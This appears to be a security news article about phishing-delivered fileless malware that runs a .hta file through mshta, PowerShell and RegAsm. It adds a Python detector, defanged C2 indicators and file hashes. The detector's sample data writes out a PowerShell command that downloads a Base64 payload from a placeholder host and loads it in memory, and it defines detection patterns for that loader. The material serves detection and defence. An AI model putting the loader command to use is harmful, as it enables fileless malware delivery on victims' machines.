
Beware of New Fileless Malware that Propagates Through Spam Mail

Recent reports indicate that threat actors are using phishing emails to distribute fileless malware. The attachment is a .hta (HTML Application) file, which is used to deploy other malware such as AgentTesla, Remcos, and LimeRAT.

The final payload is delivered in Portable Executable (PE) format but is executed without ever being written to disk on the victim's system. The phishing email's body claims to be a bank transfer notice, and the email carries an ISO image attachment that contains a .hta script file. This file runs under mshta.exe (the Microsoft HTML Application host).

Fileless Malware Via Spam Mail

According to reports shared with Cyber Security News, when the victim opens this ISO file, the embedded .hta file executes and creates a process tree consisting of mshta.exe, cmd.exe, powershell.exe, and RegAsm.exe, in that order.

ISO file embedded with .hta file (Source: AhnLab)

The mshta.exe process launches a PowerShell command. That command requests a Base64-encoded string from the server (DownloadString), decodes it, and loads the resulting bytes with CurrentDomain.Load in order to call a function from the loaded assembly. No PE file is ever created on disk; the binary runs entirely in the memory space of the PowerShell process.

Payload download and memory download (Source: AhnLab)

Furthermore, the PowerShell script also executes a DLL decoded from a Base64 string. This DLL downloads the final binary from the C2 server and injects it into RegAsm.exe (the Assembly Registration Tool). The final binary can be any malware, such as Remcos, AgentTesla, or LimeRAT.
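To show how the behaviour described above can be detected rather than merely described, here is an added Python example; it is not code from the AhnLab report or from this article. It walks a handful of constructed process-creation events (the event shape, the sample command lines and the placeholder URL are all assumptions made for the example) and flags two things the report calls out: a PowerShell command line that combines a string download, Base64 decoding and an in-memory assembly load, and a RegAsm.exe process whose ancestry is exactly mshta.exe -> cmd.exe -> powershell.exe -> RegAsm.exe.

```python
"""Detect the mshta -> cmd -> powershell -> RegAsm chain and the in-memory
PowerShell loader indicators, over constructed process-creation events.
The event format is an assumption; map your EDR/Sysmon fields onto it."""
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name only, e.g. "mshta.exe"
    cmdline: str    # full command line as logged

# Process ancestry described in the report, root first.
SUSPICIOUS_CHAIN = ["mshta.exe", "cmd.exe", "powershell.exe", "regasm.exe"]

# Command-line markers of the download-decode-load-in-memory pattern.
LOADER_PATTERNS = [
    ("download-string", re.compile(r"DownloadString", re.I)),
    ("base64-decode", re.compile(r"FromBase64String", re.I)),
    ("in-memory-load", re.compile(r"CurrentDomain\.Load", re.I)),
]

def ancestry(by_pid: Dict[int, ProcEvent], pid: int, max_depth: int = 16) -> List[str]:
    """Return lower-cased image names from the root ancestor down to pid.
    Stops on a missing parent, a cycle, or max_depth (PID reuse guard)."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen and len(chain) < max_depth:
        seen.add(cur.pid)
        chain.append(cur.image.lower())
        cur = by_pid.get(cur.ppid)
    return list(reversed(chain))

def has_chain(chain: List[str], pattern: List[str]) -> bool:
    """True if pattern occurs as a contiguous run inside chain."""
    n = len(pattern)
    return any(chain[i:i + n] == pattern for i in range(len(chain) - n + 1))

def loader_indicators(cmdline: str) -> List[str]:
    """Names of the loader markers present in a command line."""
    return [name for name, rx in LOADER_PATTERNS if rx.search(cmdline)]

def analyze(events: List[ProcEvent]) -> List[dict]:
    """Return one alert per event that matches the described tradecraft."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        image = e.image.lower()
        anc = ancestry(by_pid, e.pid)
        reasons = []
        if image == "regasm.exe" and has_chain(anc, SUSPICIOUS_CHAIN):
            reasons.append("process chain " + " -> ".join(SUSPICIOUS_CHAIN))
        if image == "powershell.exe":
            hits = loader_indicators(e.cmdline)
            if len(hits) >= 2:   # a single marker alone is common in admin scripts
                reasons.append("in-memory loader indicators: " + ", ".join(hits))
            if "mshta.exe" in anc[:-1]:
                reasons.append("powershell.exe descended from mshta.exe")
        if reasons:
            alerts.append({"pid": e.pid, "image": e.image, "reasons": reasons})
    return alerts

# Constructed sample telemetry (not real logs). The URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "mshta.exe", r"mshta.exe D:\bank_transfer.hta"),
    ProcEvent(300, 200, "cmd.exe", "cmd.exe /c powershell ..."),
    ProcEvent(400, 300, "powershell.exe",
              "powershell -nop -w hidden -c \"$d=(New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/payload.txt');"
              "[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String($d))\""),
    ProcEvent(500, 400, "RegAsm.exe", "RegAsm.exe"),
    # Benign activity that must not alert:
    ProcEvent(600, 100, "powershell.exe", "powershell Get-ChildItem C:\\Logs"),
    ProcEvent(700, 100, "devenv.exe", "devenv.exe"),
    ProcEvent(800, 700, "RegAsm.exe", "RegAsm.exe MyLib.dll /codebase"),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The two checks are deliberately separate: the loader-pattern check catches the PowerShell stage even when the parent chain is broken (for example when cmd.exe exits before the child is logged), while the ancestry check catches the RegAsm injection target even if the PowerShell command line was obfuscated enough to dodge the regexes.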

Base64 encoded DLL

AhnLab has published a complete report with detailed information about the malware, the PE file, the DLL, and related artifacts.

Indicators of Compromise

Behavior detection:
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668

File detection:
Downloader/Script.Generic
Trojan/Win.Generic.R526355

URL & C2:
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt

MD5:
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)


Guru Baran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
